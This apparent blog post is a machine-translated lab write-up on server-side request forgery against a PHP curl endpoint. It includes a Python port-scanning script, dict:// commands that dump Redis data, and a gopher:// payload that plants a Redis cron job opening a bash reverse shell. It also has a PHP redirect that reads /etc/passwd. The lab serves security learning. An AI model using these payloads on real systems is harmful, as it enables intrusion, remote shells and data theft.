当前位置:网站首页>SSRF-lab
SSRF-lab
2022-06-25 05:15:00 【Mccc_ li】
List of articles
SSRF( Server request forgery )
principle :
quite a lot web Applications provide the function of obtaining data from other servers . Use user specified URL,web The app can get pictures , Download the file , Read file contents, etc . If this function is used maliciously , You can take advantage of defective web The application acts as a proxy to attack both remote and local servers .
Pictured :
Under normal circumstances , A client sends the specified url Ask the server for something , When the server receives this request, it first Look at this. url Is it legal , Then go to the intranet resources to request this url Resources needed , Then the server returns the resource to the client .
And if a malicious user passes in url Not filtered Then he can pass ssrf Access to some resources in the intranet that are not allowed to be accessed ( That is to say client Direct access to intranet resources is not allowed , And the server can , This is it. ssrf)
stay php Will lead to ssrf Function of :
file_get_contents()
fsockopen()
curl_exec()
experiment 1:(basic)

You can see that there is curl library :
curl_init — Initialize a cURL conversation
curl_setopt ( resource $ch , int $option , mixed $value ) : bool
{
ch: from curl_init() Back to cURL Handle .
option: Required CURLOPT_XXX Options .
value: Set to option The value on the option .
The second parameter in the code is CURLOPT_URL: Is to get the following parameters url
The third parameter is the value of the second parameter , Here is post Of handler
}
curl_exec ( resource $ch ) : mixed— Perform a given cURL conversation .( That's the point , There is no filtering for the parameters we pass in , Then we can execute some malicious code )
curl Supported protocols :
file:// Can read files
Dict:// Be able to quote and allow to pass DICT List of definitions or words used by the protocol
SFTP:// ssh File transfer protocol
TFTP:// Simple file transfer protocol
LDAP:// Lightweight directory access protocol
Gopher:// Gopher Is a distributed document delivery service . Use the service , Users can browse seamlessly 、 Search and retrieve information that resides in different locations .
Use file:// Read the file 
Use dict:// Port scan :
import requests
url = "http://123.912.114.237:80/testhook.php"
porxy = [ i for i in range(1,6380)]
for i in porxy:
ip = "127.0.0.1:{0}".format(i)
try:
s = requests.post(url,data={"handler":ip},timeout=1)
if len(s.text)>0:
print(str(i)+" Port open ")
except requests.exceptions.ConnectTimeout:
print(str(i)+" Port open ")
Use dict Agreement view redis Service configuration information :
dict://127.0.0.1:6379/info

dict://127.0.0.1:6379/KEYS * Can get redis The content of
Can also bounce shell, I didn't learn it redis, Put it here first , Look at it later. :
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/www/html/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
experiment 2(advance1)

Looking at the source code, you can see , Here we use regular expressions to judge the protocol type , Determine whether the parameters we submit are http perhaps https At the beginning
I think others can use 302 Jump around first http and https, Is to load a from the outside php
<?php
header("Location:file:///etc/passwd");
?>
You can bypass , I opened the curl Jump function of , But I don't know why it didn't succeed , Bury a pit , Later research
Here you are ssrf Detailed bypass methods for : Add link description
This lab Abandoned
边栏推荐
- Svg code snippet of loading animation
- HR took the initiative to raise the salary of the test lady. How did she do it?
- [keil] GPIO output macro definition of aducm4050 official library
- 基于SSH实现的学生成绩管理系统
- Visual studio 2022 interface beautification tutorial
- There is 404 in the laravel visit, except the home page is redirected; Index php
- How micro engine uploads remote attachments
- EL & JSTL (XIII)
- Personalized Federated Learning with Moreau Envelopes
- Eyeshot 2022 Released
猜你喜欢

Go deep into the working principle of browser and JS engine (V8 engine as an example)

Ctfhub eggs

CSRF (Cross Site Request Forgery) &ssrf (server request forgery) (IV)

API interface management setup -eolinker4.0

Ranorex Studio 10.1 Crack
![H5 native player [learn video]](/img/51/83a200d0423b7274d1e981ec2ede2c.jpg)
H5 native player [learn video]

How to install the blue lake plug-in to support Photoshop CC 2017

The construction and usage of wampserver framework

February 20ctf record

Compatible with Internet Explorer
随机推荐
Go deep into the working principle of browser and JS engine (V8 engine as an example)
Laravel Vonage SMS sending
PHP uses JWT
Enhanced paste quill editor
IronOCR 2022.1 Crack
Read the general components of antd source code
PHP calls map API
XSS (cross site script attack) summary (II)
Rce code execution & command execution (V)
parallel recovery slave next change & parallel recovery push change
[keil] GPIO output macro definition of aducm4050 official library
Uva1103 ancient pictograph recognition
What is Ethernet and how to connect the computer
Create dynamic array
SRC platform summary
渗透测试-提权专题
JS handwriting depth clone array and object
Using JS to realize the sidebar of life information network
Two hours to take you into the software testing industry (with a full set of software testing learning routes)
How to use the Magic pig system reinstallation master